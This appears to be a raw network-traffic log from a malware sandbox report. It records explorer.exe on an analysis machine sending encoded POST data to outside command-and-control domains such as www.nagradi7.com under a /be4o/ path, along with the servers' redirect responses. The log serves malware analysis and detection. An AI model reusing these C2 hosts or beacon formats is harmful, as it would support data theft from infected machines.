                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 68 31 38 4a 53 55 6b 6b 33 30 37 71 45 46 51 4a 70 53 39 63 76 53 36 48 4f 49 32 34 62 48 30 59 52 47 59 50 53 36 74 63 6e 36 67 47 39 74 77 35 47 75 31 58 49 4c 31 5f 75 5a 36 51 39 6d 4a 5a 36 52 32 57 74 7a 56 72 7e 46 54 4d 7a 6e 56 6f 55 46 72 4a 6b 31 6a 6a 39 62 69 34 39 74 4c 68 7e 62 4b 41 49 51 4e 63 53 70 56 36 47 32 79 69 71 4a 70 66 65 36 53 7a 45 5f 61 6d 4c 33 48 47 48 77 53 73 46 75 62 55 4e 70 64 33 6e 5f 4e 39 50 77 65 4a 50 51 6c 38 57 4b 33 58 7a 37 61 48 67 55 39 43 7e 78 37 44 53 76 74 5f 7e 36 66 5f 34 5f 39 47 78 6b 39 46 76 39 4e 70 6a 61 4e 4b 47 4b 71 36 4c 79 61 53 73 6e 4f 77 43 64 4f 62 4d 55 62 52 53 61 7a 4b 4c 69 35 57 28 32 43 43 52 43 63 55 31 64 79 36 73 77 6f 53 75 62 46 52 62 4b 71 54 47 42 53 46 61 4a 63 45 61 36 69 66 43 58 41 77 68 45 77 53 57 54 50 4f 51 6e 33 31 65 73 7a 61 6a 77 65 32 57 36 56 73 68 51 35 34 71 55 4b 31 47 4a 46 6e 6a 5f 54 6c 30 6a 46 66 48 46 68 73 4a 71 54 58 47 39 52 43 71 61 67 31 7a 30 51 69 61 72 63 6a 39 64 5a 57 33 63 77 65 6f 31 78 57 53 4b 71 64 51 63 36 50 37 44 38 31 70 78 41 7a 78 48 6c 77 63 58 47 36 36 46 6f 45 66 45 4e 76 76 71 47 71 4c 46 47 75 37 79 33 56 46 70 59 6b 53 30 62 44 7e 75 4f 36 7e 76 65 63 6a 71 78 64 38 4e 28 4f 39 45 6c 55 6e 32 4f 52 4b 70 47 58 38 73 76 43 44 7a 4f 33 78 41 36 30 7a 48 43 69 6a 4a 65 52 7e 46 4b 6b 77 67 6d 33 51 6c 79 54 43 4e 67 47 73 4b 43 4d 45 38 42 77 68 70 50 45 7e 35 58 48 61 37 74 68 48 34 51 6e 4b 32 77 2d 38 79 76 36 6c 50 37 46 45 79 4d 7a 4f 34 78 35 79 4b 6c 2d 70 52 71 4b 6a 4e 73 59 6e 75 76 68 43 39 54 41 44 6c 7e 65 6c 6a 4a 6b 78 61 4d 71 66 4a 58 74 43 5a 74 48 56 43 6f 55 59 59 4d 75 44 5f 37 36 33 58 4f 4b 39 65 38 4e 4b 64 51 33 6b 49 37 33 70 54 79 65 45 6c 74 7a 4d 63 56 63 61 67 7a 59 58 53 4d 70 61 78 68 35 77 4d 30 63 4c 56 6d 5a 4c 7a 28 62 47 6b 6b 63 6c 46 70 57 6a 39 50 66 4c 34 49 49 75 66 78 32 42 61 74 58 66 6c 59 55 34 63 6c 48 38 37 42 75 71 37 59 57 30 44 56 45 4e 56 73 6a 6d 51 64 34 73 4d 56 76 4a 35 63 62 69 71 30 79 48 42 52 6c 63 43 6b 4c 52 33 54 63 53 70 74 36 42 71 57 70 30 41 75 62 74 55 32 34 62 76 57 76 74 57 4d 38 49 33 63 6a 37 54 78 79 74 54 66 57 63 53 35 67 59 76 41 4d 77 42 78 6e 30 52 66 54 52 47 6c 41 69 6e 31 58 6b 4d 6f 6e 43 39 54 46 6e 4c 4f 34 67 46 58 47 32 49 59 71 49 58 76 4d 4e 4d 33 62 35 50 6c 5a 43 55 76 31 4a 75 50 7a 75 47 4e 33 32 5a 74 41 5a 39 50 6f 79 61 55 38 45 45 4a 69 50 38 53 63 77 67 6c 41 6a 38 59 46 66 44 77 34 34 74 59 63 64 55 39 65 6d 37 49 38 46 50 4c 63 63 56 4f 71 68 70 51 64 59 55 5a 5f 46 59 72 2d 6e 47 35 66 41 72 34 51 69 59 71 6f 67 38 48 71 45 77 56 4e 6c 42 4f 56 78 52 55 5f 64 32 37 70 33 5a 6c
                                                                                                                                                                                                                              Data Ascii: h48Hl=h18JSUkk307qEFQJpS9cvS6HOI24bH0YRGYPS6tcn6gG9tw5Gu1XIL1_uZ6Q9mJZ6R2WtzVr~FTMznVoUFrJk1jj9bi49tLh~bKAIQNcSpV6G2yiqJpfe6SzE_amL3HGHwSsFubUNpd3n_N9PweJPQl8WK3Xz7aHgU9C~x7DSvt_~6f_4_9Gxk9Fv9NpjaNKGKq6LyaSsnOwCdObMUbRSazKLi5W(2CCRCcU1dy6swoSubFRbKqTGBSFaJcEa6ifCXAwhEwSWTPOQn31eszajwe2W6VshQ54qUK1GJFnj_Tl0jFfHFhsJqTXG9RCqag1z0Qiarcj9dZW3cweo1xWSKqdQc6P7D81pxAzxHlwcXG66FoEfENvvqGqLFGu7y3VFpYkS0bD~uO6~vecjqxd8N(O9ElUn2ORKpGX8svCDzO3xA60zHCijJeR~FKkwgm3QlyTCNgGsKCME8BwhpPE~5XHa7thH4QnK2w-8yv6lP7FEyMzO4x5yKl-pRqKjNsYnuvhC9TADl~eljJkxaMqfJXtCZtHVCoUYYMuD_763XOK9e8NKdQ3kI73pTyeEltzMcVcagzYXSMpaxh5wM0cLVmZLz(bGkkclFpWj9PfL4IIufx2BatXflYU4clH87Buq7YW0DVENVsjmQd4sMVvJ5cbiq0yHBRlcCkLR3TcSpt6BqWp0AubtU24bvWvtWM8I3cj7TxytTfWcS5gYvAMwBxn0RfTRGlAin1XkMonC9TFnLO4gFXG2IYqIXvMNM3b5PlZCUv1JuPzuGN32ZtAZ9PoyaU8EEJiP8ScwglAj8YFfDw44tYcdU9em7I8FPLccVOqhpQdYUZ_FYr-nG5fAr4QiYqog8HqEwVNlBOVxRU_d27p3Zl
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.299684048 CET10181OUTData Raw: 65 55 72 6c 33 48 34 4e 43 6f 6e 57 38 70 49 33 47 57 6c 48 67 63 6d 77 30 53 43 75 6a 5a 78 48 2d 6c 69 34 59 4c 72 48 6a 55 5f 4d 34 4f 35 76 6b 48 75 36 6d 38 4c 57 4a 48 53 65 47 37 44 67 64 54 52 54 77 33 42 54 63 53 33 52 39 70 78 45 4e 66
                                                                                                                                                                                                                              Data Ascii: eUrl3H4NConW8pI3GWlHgcmw0SCujZxH-li4YLrHjU_M4O5vkHu6m8LWJHSeG7DgdTRTw3BTcS3R9pxENfoK5gb0c0z5yZWFALFbdVO3ehCU-a4fs466_~5P14NyjgAE1heBS62P1SdAj1v70uid5hzyWxjyiyQCUdQnw60gjMh7A6zwjlsxPoir4c8oAuaC-UoaDhzmWmV8gw2O8MZgg2K0A4NZOY7ZzzPtd~PZXax1n50tj1S
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.299731016 CET10186OUTData Raw: 37 53 59 38 31 72 49 45 57 58 5a 30 44 70 55 75 44 30 71 30 4a 73 4b 4f 41 49 31 72 55 41 41 31 66 42 42 63 74 37 51 7a 52 4d 76 39 48 64 56 73 79 6a 41 64 6d 73 4f 33 69 78 4e 6f 6b 34 33 38 64 47 5a 76 66 47 6b 4c 38 33 31 49 42 6b 48 53 50 62
                                                                                                                                                                                                                              Data Ascii: 7SY81rIEWXZ0DpUuD0q0JsKOAI1rUAA1fBBct7QzRMv9HdVsyjAdmsO3ixNok438dGZvfGkL831IBkHSPbAbIqfIxxX0Bxa4sES2KuD4Da_WTetrMLrT80cIrKqyOnmiedPLMVnz1tv6fzbS6i9FPMBnhCevzU6O7bAt_tgRpMgfguGBQHEpSq1CTxpOTFyw4VmjD8jvCBspxUzyIftPj~_Ij71KiqAK7iPZ5phovtaDfyD35Bi
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.299907923 CET10187OUTData Raw: 57 58 67 61 6e 54 41 6f 65 30 66 51 75 4c 33 48 62 78 33 4e 71 77 74 59 54 71 6f 32 30 62 58 65 58 76 5a 36 6f 38 78 38 42 4c 6f 6c 2d 68 6c 7e 57 32 41 35 75 69 66 49 6d 74 53 77 48 5a 79 6c 64 4c 54 28 7a 38 33 69 70 30 65 6b 4d 54 32 65 6b 57
                                                                                                                                                                                                                              Data Ascii: WXganTAoe0fQuL3Hbx3NqwtYTqo20bXeXvZ6o8x8BLol-hl~W2A5uifImtSwHZyldLT(z83ip0ekMT2ekWna_62Z4zla2IyyX(1R5DLbh353PqyOWfe1xEnX_rqcJ4CFWUrDjSdIzgVBEvMa-Kr3lcUfJbDxfTBY3iP~V6-FpaLhu2teqQNXHEAHsbxbLuNFw1MslgyF5PHZ6hgTfmAb_gaDILVtrx4(lVIZsK9gh6O3op-BggR
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335007906 CET10188INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:02 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 142
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.mariachinuevozacatecas24-7.com/be4o/
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335016966 CET10189OUTData Raw: 4d 4c 68 56 6f 77 4e 74 66 4b 4a 6d 32 61 30 54 52 4d 38 69 66 41 5a 68 57 56 58 66 62 79 41 38 51 31 43 69 64 39 37 73 69 54 50 4c 5a 54 4f 56 44 66 32 7a 36 69 47 58 70 67 78 76 66 33 37 43 36 28 57 42 37 55 4e 6b 7a 75 5f 71 67 75 79 69 62 4b
                                                                                                                                                                                                                              Data Ascii: MLhVowNtfKJm2a0TRM8ifAZhWVXfbyA8Q1Cid97siTPLZTOVDf2z6iGXpgxvf37C6(WB7UNkzu_qguyibKCNKnYHJn7LY4E7sJf2Vm923OfKwX7aexLCBCp3YXRxiDNUsfFnTPNZ0lkK7EdeSKBY3HDfYlgOFcJOGaHddI6YYabfFS8puIs4LOr65akkgv_SzFrnuvYwYfRPOsrORPOr5j_YKtb8Eb47RrKrAIXP3e_e6fh9aUq
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335057974 CET10191OUTData Raw: 76 54 76 31 35 53 39 31 69 4b 7a 6d 6d 47 72 6b 6f 7e 74 43 4a 61 68 49 73 45 7a 39 4f 54 6d 41 77 77 6a 37 67 4f 4b 63 49 5a 6d 4c 34 47 32 70 42 75 46 62 47 56 50 49 54 54 31 75 62 70 64 46 58 70 67 37 50 42 63 69 75 5a 36 67 5f 79 77 48 2d 5a
                                                                                                                                                                                                                              Data Ascii: vTv15S91iKzmmGrko~tCJahIsEz9OTmAwwj7gOKcIZmL4G2pBuFbGVPITT1ubpdFXpg7PBciuZ6g_ywH-ZZlP3ZtFwvLdNxrkNPXNXFO4T_k4W1hTuiJeIIYwiCAbvxjXHl6XEwrjsOLqoHkmLS(30BNA29mxXP15EI7KbvHwaCY0fH7xK8rGnEMkRUW8K7BH9lvlACOKYfERL7B4tDmGxTeTY3mTeNvzN4(4aAAz4F3jAEc7TT
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335131884 CET10192OUTData Raw: 71 55 52 4c 4d 43 58 43 68 33 32 55 42 39 34 45 6a 78 41 68 45 44 74 48 73 68 6d 66 41 68 57 43 75 67 41 41 67 6d 76 62 78 42 61 6f 71 6c 35 4c 44 50 6d 30 37 68 73 4c 78 39 74 53 4b 45 79 4d 42 6c 45 71 61 71 78 36 47 77 56 4b 6e 70 77 45 45 66
                                                                                                                                                                                                                              Data Ascii: qURLMCXCh32UB94EjxAhEDtHshmfAhWCugAAgmvbxBaoql5LDPm07hsLx9tSKEyMBlEqaqx6GwVKnpwEEfvzK2rt4jit5571qzR~8iJ3e2HWGK4TSqwGrZaqVoQR1RTQMvMy9Dfl8dMLbLpVG21gQtkXoRelPHD4l76UqA3peRzBzdrFiQbdYPSkg81kgwxw6pmixwmzkK1legWAzLY~1Guzz~qmrW0ML9XsTaExPkB8PK-7T5V
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335199118 CET10195OUTData Raw: 72 73 53 77 68 70 54 67 45 54 5a 41 6e 74 42 55 39 66 34 50 45 6f 6b 52 61 72 43 4a 32 4a 51 6e 61 6b 62 74 5a 42 4a 4d 72 38 6f 6f 49 7e 64 51 42 50 74 66 35 6b 6a 5a 42 42 67 4d 70 37 67 4a 68 5a 58 54 38 69 73 58 52 4b 61 74 57 4e 4c 59 43 4e
                                                                                                                                                                                                                              Data Ascii: rsSwhpTgETZAntBU9f4PEokRarCJ2JQnakbtZBJMr8ooI~dQBPtf5kjZBBgMp7gJhZXT8isXRKatWNLYCNUOz9wfzuoLMyxg129uZu_kukoQchB9iYEne9BxjPnUw1rakqu~CYfCtd2CFYN3ebaBQ34DDUb0fTQYxDQfEENDxb22sHu~P2nJo7FvJEoJrzlkur5Kl2FLutY(JNiE71cvR5a9R5vP0pxGL41rUHh(Tkwlic8MF8y
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335380077 CET10196OUTData Raw: 65 30 67 65 75 70 69 51 59 32 5f 37 4d 62 5a 59 4d 65 56 6a 45 5a 54 62 66 62 79 73 73 58 68 67 6a 45 42 66 47 62 37 46 7a 37 4d 67 66 48 36 4b 5f 39 65 31 65 50 38 75 66 7e 54 51 4d 6a 79 38 36 4a 32 39 6a 49 34 4e 64 70 6d 30 6a 41 59 41 72 69
                                                                                                                                                                                                                              Data Ascii: e0geupiQY2_7MbZYMeVjEZTbfbyssXhgjEBfGb7Fz7MgfH6K_9e1eP8uf~TQMjy86J29jI4Ndpm0jAYArizlSFcFX2NlixIHoLcf2QM5EY-udGoY6LpP2b-CfxLj0Q35ScSPm(IuLqSkCsz9Xuny6IKgNDHaR9w02FNITfKAS6QLkuOT50Zdb0OLJ0IiW0d4BF6g2QkCMdmMwxnwR3CMBBzFb1_USkadoi_LJFfRif0x1KtCzN9


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              35192.168.11.204983254.154.44.3980C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.336623907 CET10197OUTGET /be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&7nx8=7nN0Wh-H7 HTTP/1.1
                                                                                                                                                                                                                              Host: www.mariachinuevozacatecas24-7.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.372431993 CET10198INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:02 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 142
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.mariachinuevozacatecas24-7.com/be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&7nx8=7nN0Wh-H7
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              36192.168.11.2049833154.214.67.11580C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.175852060 CET10203OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.nagradi7.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.nagradi7.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.nagradi7.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 72 79 50 6e 59 46 28 47 65 4d 73 38 57 6b 37 57 73 74 32 4f 4f 33 41 68 6e 45 63 4e 67 37 55 72 35 50 69 53 74 55 4d 6c 78 69 37 6c 63 6e 31 77 52 33 47 4f 31 6d 73 4a 4a 42 49 66 45 4e 32 70 4b 65 75 6c 74 6f 6a 35 48 75 64 72 38 77 50 76 4c 74 74 76 59 4a 74 47 4a 73 71 6f 4c 5f 6f 72 73 43 64 5f 6f 4b 4b 54 63 52 6e 75 32 73 31 64 56 37 44 49 35 50 38 32 55 6a 6d 54 44 39 52 4d 45 6f 73 57 33 42 51 4c 70 44 62 34 6a 59 63 30 59 34 65 53 4f 65 7e 56 6e 79 66 39 4c 75 59 55 74 55 43 35 65 6a 58 68 4f 35 6d 69 52 74 4e 6e 74 6d 33 7a 54 64 4d 6f 31 6a 72 6e 39 4a 63 5f 69 61 56 4b 50 4d 4c 52 4c 30 6b 4d 37 42 28 45 33 69 41 57 7a 51 48 6f 6d 65 65 44 65 34 6a 41 48 63 67 59 6a 6e 54 59 56 78 4b 47 7e 75 37 6b 6b 38 77 6c 6a 68 52 78 66 4e 31 66 74 37 28 5f 33 7a 4b 63 72 6d 7e 79 76 45 6d 77 54 4e 65 53 69 6f 59 5f 6a 47 38 73 7a 2d 6d 78 36 32 79 4e 66 6d 52 56 32 32 6b 45 45 6e 6b 6b 43 59 6c 69 75 2d 28 6a 47 32 6c 6d 74 58 72 36 5a 49 7a 58 4f 31 72 79 57 47 45 4c 65 70 73 6d 5a 69 37 68 34 36 4c 6a 4b 31 63 4b 75 77 30 43 54 7a 6c 31 77 56 66 45 6c 43 7a 32 4a 4a 6e 53 72 54 6c 30 4a 4b 28 67 6d 4b 33 69 7e 71 63 50 47 78 55 67 75 61 69 48 49 62 78 76 49 76 61 48 6b 55 71 33 46 73 73 48 72 6f 62 64 71 6a 56 72 6e 6b 78 4f 30 76 43 6c 4c 59 4a 46 50 6a 67 6d 7a 43 69 38 32 38 74 30 51 41 53 53 6b 66 49 62 65 71 28 48 71 51 55 44 52 36 42 43 4d 77 6e 76 39 52 58 75 62 75 42 67 53 5f 54 65 64 7a 76 6d 70 32 51 49 6a 47 51 52 57 76 64 77 4f 63 64 6f 67 49 70 62 47 74 4e 51 61 74 41 4d 70 6c 69 46 74 48 6d 4c 6b 75 28 46 53 73 79 75 57 51 32 57 6c 41 45 54 4b 36 51 4a 35 72 53 39 57 34 59 75 61 76 6b 78 6d 4d 6b 67 46 41 55 54 44 4a 65 6f 6a 6e 48 55 39 37 38 51 50 45 59 58 37 4a 34 37 68 38 7e 59 74 67 67 75 75 30 41 35 72 4e 72 50 6e 62 4a 38 56 61 71 62 66 6b 68 79 50 65 76 6a 41 64 31 78 42 79 6a 4d 63 6e 78 56 4d 78 65 7a 72 39 63 58 68 64 4e 58 4d 51 56 46 4d 39 70 76 68 6e 59 6c 79 76 49 42 59 4a 6c 47 6f 47 38 59 4a 2d 6e 34 34 75 4d 53 45 70 4b 79 72 57 78 54 42 46 6a 50 64 65 6a 56 4e 4d 76 4b 31 35 67 78 36 36 32 6e 44 58 35 43 39 47 74 46 70 6a 76 39 55 75 51 43 42 4a 30 30 32 2d 4c 31 7a 4f 6c 4e 55 43 4e 77 68 6f 41 31 51 43 37 38 36 6d 28 39 61 32 6f 72 28 30 6d 72 6f 54 4d 6f 55 62 74 6f 66 76 4e 55 4b 65 6c 33 79 68 36 46 6d 39 68 62 37 31 61 42 68 30 4d 30 75 62 63 67 33 5f 31 33 4b 51 59 75 78 35 35 6b 7e 4f 70 30 35 5f 50 53 48 50 48 36 6c 59 61 54 76 66 5a 71 50 38 72 4d 50 37 4a 67 70 4d 47 59 4b 37 36 37 33 57 63 6c 78 78 32 4f 56 5a 37 45 44 6b 50 54 69 77 49 4d 61 41 54 32 38 46 4b 62 63 44 47 31 59 72 57 63 46 64 4e 41 56 71 68 61 54 4b 44 68 63 4d 39 42 55 52 45 72 52 75 52 65 76 34 41 6d 63 76 39 74 37 6d 77 68 56 36 52 4e 32 41 28 53 4e 6c 4c 34 50 6a 48 74 76 54 50 4f 31 46 30 46 51 63 44 62 62 4f 52 48 49 6f 34 4f 4e 49 53 6f 59 72 4b 6b 45 76 62 76 72 4a 54 64 7a 41 76 72 51 55 65 53 77 61 6f 44 39 4d 44 70 59 31 54 54 38 66 4f 31 48 52 70 4c 4f 4e 4e 78 79 54 64 67 66 65 55 69 65 2d 35 47 39 71 4a 68 50 56 69 48 4e 66 68 52 74 56 7e 5a 42 44 64 62 41 31 6d 61 63 33 6a 65 31 35 62 63 39 4a 4e 50 69 66 6b 47 38 6f 44 5f 6f 59 58 79 5a 72 4a 43 58 6e 32 55 43 58 69 5f 4d 50 55 59 52 43 34 57 39 4a 53 55 47 42 64 37 4d 61 78 42 43 69 35 32 73 66 35 6d 56 6f 61 72 74 42 4d 5f 4f 66 51 72 71 73 71 57 33 58 64 47 30 76 39 71 6a 47 43 49 69 73 79 6c 30 37 35 6d 72 38 30 57 33 44 58 4d 78 70 59 75 33 76 6e 43 7a 2d 4e 55 4b 5a 73 72 5a 46 38 45 4e 70 4e 41 39 4d 6e 76 75 59 7e 5f 5a 58 4b 39 6c 4a 75 49 62 49 77 6f 66 70 50 35 41 56 71 65 79 6d 75 47 30 4c 30 78 66 59 52 37 4b 55 49 50 35 44 6a 59 61 48 70 42 49 50 33 51 70 57 4d 44 33 4d 41 47 45 62 70 46 50 59 32 77 4c 37 31 78 59 39 4a 4b 4f 49 73 75 58 45 36 65 76 6a 41 30 38 52 55 73 79 76 36 30 28 48 50 5f 73 55 62 6a 62 71 50 49 61 6e 76 53 4b 76 7a 62 6f 50 45 53 36 43 66 6e 57 57 32 68 6a 7a 6e 53 79 58 4a 4a 4b 4b 41 5a 51 77 44 4b 79 56 34 6b 53 64 4e 4c 63 4d 47 77 45 73 6f 4e 6b 6e 42 7a 53 33 63 78 4f 64 63 68 63 79 54 58 66 73 63 49 59 30 4b 58 56 5f 51 78 4d 33 5a 51 38 4a 39 41 30 47 56 77 55 63 55 49 65
                                                                                                                                                                                                                              Data Ascii: h48Hl=ryPnYF(GeMs8Wk7Wst2OO3AhnEcNg7Ur5PiStUMlxi7lcn1wR3GO1msJJBIfEN2pKeultoj5Hudr8wPvLttvYJtGJsqoL_orsCd_oKKTcRnu2s1dV7DI5P82UjmTD9RMEosW3BQLpDb4jYc0Y4eSOe~Vnyf9LuYUtUC5ejXhO5miRtNntm3zTdMo1jrn9Jc_iaVKPMLRL0kM7B(E3iAWzQHomeeDe4jAHcgYjnTYVxKG~u7kk8wljhRxfN1ft7(_3zKcrm~yvEmwTNeSioY_jG8sz-mx62yNfmRV22kEEnkkCYliu-(jG2lmtXr6ZIzXO1ryWGELepsmZi7h46LjK1cKuw0CTzl1wVfElCz2JJnSrTl0JK(gmK3i~qcPGxUguaiHIbxvIvaHkUq3FssHrobdqjVrnkxO0vClLYJFPjgmzCi828t0QASSkfIbeq(HqQUDR6BCMwnv9RXubuBgS_Tedzvmp2QIjGQRWvdwOcdogIpbGtNQatAMpliFtHmLku(FSsyuWQ2WlAETK6QJ5rS9W4YuavkxmMkgFAUTDJeojnHU978QPEYX7J47h8~Ytgguu0A5rNrPnbJ8VaqbfkhyPevjAd1xByjMcnxVMxezr9cXhdNXMQVFM9pvhnYlyvIBYJlGoG8YJ-n44uMSEpKyrWxTBFjPdejVNMvK15gx662nDX5C9GtFpjv9UuQCBJ002-L1zOlNUCNwhoA1QC786m(9a2or(0mroTMoUbtofvNUKel3yh6Fm9hb71aBh0M0ubcg3_13KQYux55k~Op05_PSHPH6lYaTvfZqP8rMP7JgpMGYK7673Wclxx2OVZ7EDkPTiwIMaAT28FKbcDG1YrWcFdNAVqhaTKDhcM9BURErRuRev4Amcv9t7mwhV6RN2A(SNlL4PjHtvTPO1F0FQcDbbORHIo4ONISoYrKkEvbvrJTdzAvrQUeSwaoD9MDpY1TT8fO1HRpLONNxyTdgfeUie-5G9qJhPViHNfhRtV~ZBDdbA1mac3je15bc9JNPifkG8oD_oYXyZrJCXn2UCXi_MPUYRC4W9JSUGBd7MaxBCi52sf5mVoartBM_OfQrqsqW3XdG0v9qjGCIisyl075mr80W3DXMxpYu3vnCz-NUKZsrZF8ENpNA9MnvuY~_ZXK9lJuIbIwofpP5AVqeymuG0L0xfYR7KUIP5DjYaHpBIP3QpWMD3MAGEbpFPY2wL71xY9JKOIsuXE6evjA08RUsyv60(HP_sUbjbqPIanvSKvzboPES6CfnWW2hjznSyXJJKKAZQwDKyV4kSdNLcMGwEsoNknBzS3cxOdchcyTXfscIY0KXV_QxM3ZQ8J9A0GVwUcUIeh9CCfo2rXMqwBl8gLrZIlmLT-bpJVSe~ll1M7KJsl1u~Aafq8km6LJ56IzLgFxDiEoeH2bajVvPeiVpAJwCYx6rVIpv(0TrpBPVxPIzroWoN5pVQIy-8k9rYgYrO6RiVnl2Sbg10-5J9b3_7TlK8wWCvln0Ox4A8YQboLm5jmvR0SYYZ3xuBu~mjli8LZVOrCV6u8fJ(5mizc4aWPtAIshATzkU7zEY4UQovAPIruGUvslaYlW_nWgPsEs0hlg0vLbJ7gm4b2XSz2onhRUGn17e5ZCiMQW6ciqPjO323x3idcCY8AlVzVcEtsJeWveUvichf8dBs3f38dPVLAmIbmgYnTxG6k(fkb9fl2PDNE(KGa4NtqherllB6BkKbfbQo2NUy0yTaEVK4PX2IUannBctko39TBkrB7(glKSRKHGBFouic2DUSbdKqfjqn1JEX7WabfxgdFWKI6IMQyQ5RUHrVuC6waxhuKjictc3VQXkwRqJaA6SLflgEOcLQxCsvUAiV_LhgS4-wuVBydVpdGa-B2RuG-(NxurXi64NmB(Q2Zfz6Vhe2RfbJR4z8BTABIgA~sD3ChMs7Iys8jpAr2SADnxUfZPzTroKW4sBldW840ZRTEOejENS1HaAWZIa53aDRoJZVMJQefKH51HaBhhK4aL39UtAuaR4gKIK~XB3NvIaapQB63ILhqZA7aWRIeH8cXuKU4xj88YGK6zYDvflOmVnMvn_uBr4ZAwCX7HcAmeh4ksr0s0yfHKEuYaBrOjKstHXYONj(U5nh4EcFL6kn71UfNN2prTiOop0YkOhr50amTyWipljkn9Ifi1fhPfUThJrEhSPUCj63iFLiTucDn1XYgk_EoATKNUEkq9-l_(2ADY078QUtaGWL78Qi2QYAEbQynfENnPN7GWP(6gnVRPS6dKoxxo46FisJK0aVs2VaGNGcJ1z0am0IU0JUhB_JLxYyDrK9LQ7RSf_TXoOx5z903~JhiqcL1E-kaP-wrNE1fZEPae_WPQjkradRsif9UN8q1WIr2ip7Fc3rVMvUqS3B1Ew~mcBfIKD3gvDLQ0B2GZYdvJEt9lcP7vziXFUbFowqLLcCVZcu6qllC8JJgmRYQxAgg5jyVaPpQ1vUBidsf219fljlA04rIiwDojWiew165w98dj_nTnInGRrkPh1VKWC9x5CxHm890hpdF4YsmB2Yt5LzPxFTPWJFOjGahgAAOKhSbu1iyYT38QmBLX7FV~U~Q9qkQJ2vd1S3NBdksqbdNKUPNQ1vrxgs1fa2vrzXGJ0AMnRzJtnPVLr4yVZq538~fd45yYbX_dlXOyVwzYm4nUWFmZR8wlF2TGdvmm9i24wSHhvrP~36aE6iUh1mrpxO6xG0CIYqc5uOtJAk674jTRdi15VWNE1Z18nUcCs4brXu7bpQY7F6DXyUeiOtO(O54QsNnhGKHV8ieETFu8EO_P6rVsTwx73a8C5X_OjKxYWKCpbycUw2wYeT66mNPn5Nalis67Px1520t6otEd-XswJmV5nMyqbefr-QzmbayM2oc5cICv5odIt4GVb~FZ5bFpevi4THM6sKV2nRSpYbqMHz8FBFhcEX6n29Lu4Jod6EZlps5vgjBehwSyiz